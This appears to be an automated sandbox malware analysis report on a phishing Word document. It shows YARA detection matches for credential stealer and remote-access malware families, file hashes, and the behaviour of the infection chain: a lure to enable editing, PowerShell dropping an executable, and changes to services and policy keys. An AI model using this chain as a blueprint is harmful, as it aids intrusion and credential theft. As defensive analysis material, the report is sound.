Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing when opening. 0 Page:l of 2 , Words:19 I 3 I N@m 13 ;a 10096 G) FI G) ,, .
Source: Screenshot number: 12	Screenshot OCR: Enable Editing when opening. ii: ^ Double-click to Activate Contents Package S

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\doc.exe

Jump to dropped file

Microsoft Office creates scripting files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT

Jump to behavior

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe

Jump to dropped file

.NET source code contains very large strings

Show sources

Source: doc[1].exe.0.dr, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: doc.exe.5.dr, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: maBdogbw.exe.9.dr, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 9.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 9.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 12.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 12.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 13.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 13.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 14.2.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776
Source: 14.0.doc.exe.200000.0.unpack, UX.WinForms/Api/NativeWindowHook.cs	Long String: Length: 75776

Found suspicious RTF objects

Show sources

Source: abdtfhgXgeghDh.ScT

Static RTF information: Object: 0 Offset: 00000965h abdtfhgXgeghDh.ScT

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_001F2000
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_001F25C8
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_001F4AEF
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_001F3AE2
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_001F4B00
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_02175A18
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_021766CA
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_021748AA
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00411BF8

Source: doc[1].exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: doc.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: maBdogbw.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe 30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\doc.exe 30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\maBdogbw.exe 30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E

Source: C:\Users\user\AppData\Roaming\doc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\doc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\doc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\doc.exe	Memory allocated: 76E90000 page execute and read and write

Source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000002.426889851.00000000001E0000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000005.00000002.429130471.0000000000260000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: Process Memory Space: powershell.exe PID: 1868, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 2968, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: String function: 004035E5 appears 40 times
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: String function: 00410969 appears 47 times

Source: doc[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: doc.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: maBdogbw.exe.9.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$talogue_2021_samples_list_revise_ol.doc

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@23/22@0/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_004130B3 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,

Source: C:\Users\user\AppData\Roaming\doc.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: catalogue_2021_samples_list_revise_ol.doc	Virustotal: Detection: 44%
Source: catalogue_2021_samples_list_revise_ol.doc	ReversingLabs: Detection: 31%

Source: C:\Users\user\AppData\Roaming\doc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.................2.....p.........2.......-.....`I/........v.....................K6.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#..................k......................R.............}..v....p.......0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.}..............#Z.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../..................k....`.................R.............}..v............0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.R.............}..v............0.}..............#Z.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;..................k......................R.............}..v....(.......0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............Q..k....0'Z...............R.............}..v............0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G..................k......................R.............}..v....(.......0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............Q..k....0'Z...............R.............}..v............0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S..................k......................R.............}..v....(.......0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'.`.......0.}..............#Z.....8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._..................k......................R.............}..v............0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............Q..k......................R.............}..v....X.......0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k..................k......................R.............}..v............0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.@.....w...............Q..k....0'Z...............R.............}..v............0.}.....................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w..................k......................R.............}..v............0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......Q..k....0'Z...............R.............}..v............0.}..............#Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....H.................R.............}..v............0.}..............$Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.@......................y.k......Z...............R.............}..v....0N......0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k.....N................R.............}..v....hO......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................y.k......Z...............R.............}..v.....U......0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k.....V................R.............}..v....0W......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v....@[......0.}.............x.Z.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k.....[................R.............}..v....x\......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................y.k......Z...............R.............}..v....@c......0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k.....c................R.............}..v....xd......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................y.k......Z...............R.............}..v....@k......0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k.....k................R.............}..v....xl......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'..p......0.}.............x.Z.....8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k....hq................R.............}..v.....q......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................y.k......Z...............R.............}..v.....x......0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k....hy................R.............}..v.....y......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....~......0.}.............x.Z.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k.....~................R.............}..v....8.......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................y.k......Z...............R.............}..v............0.}.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k......................R.............}..v....8.......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.}.............x.Z.....<.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k....0.................R.............}..v............0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ........y.k......Z...............R.............}..v....@.......0.}.............x.Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................v.k......................R.............}..v....x.......0.}...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.................2.....p.........2.......-.....`I/........v.....................K6.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................/#k....H.................R.............}..v............0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.}.............x.f.....6.......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................/#k......................R.............}..v....8.......0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.R.............}..v....H.......0.}.............x.f.....".......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................/#k......................R.............}..v............0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.................#k....."f...............R.............}..v....H.......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................/#k......................R.............}..v............0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S.................#k....."f...............R.............}..v....H.......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................/#k......................R.............}..v............0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'.........0.}.............x.f.....8.......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................/#k....p.................R.............}..v............0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k.................#k......................R.............}..v............0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................/#k....h.................R.............}..v............0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.@.....w.................#k....."f...............R.............}..v.... .......0.}.....................f.......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................/#k......................R.............}..v....X.......0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .........#k....."f...............R.............}..v............0.}.............x.f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../#k......................R.............}..v.... .......0.}.............. f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.@.......................#k....P.f...............R.............}..v.....Q......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k....@R................R.............}..v.....R......0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................#k....P.f...............R.............}..v....PY......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k.....Z................R.............}..v.....Z......0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v.....^......0.}...............f.....$.......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k....P_................R.............}..v....._......0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................#k....P.f...............R.............}..v.....f......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k....Pg................R.............}..v.....g......0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................#k....P.f...............R.............}..v.....n......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k....Po................R.............}..v.....o......0.}...............f.............D...............
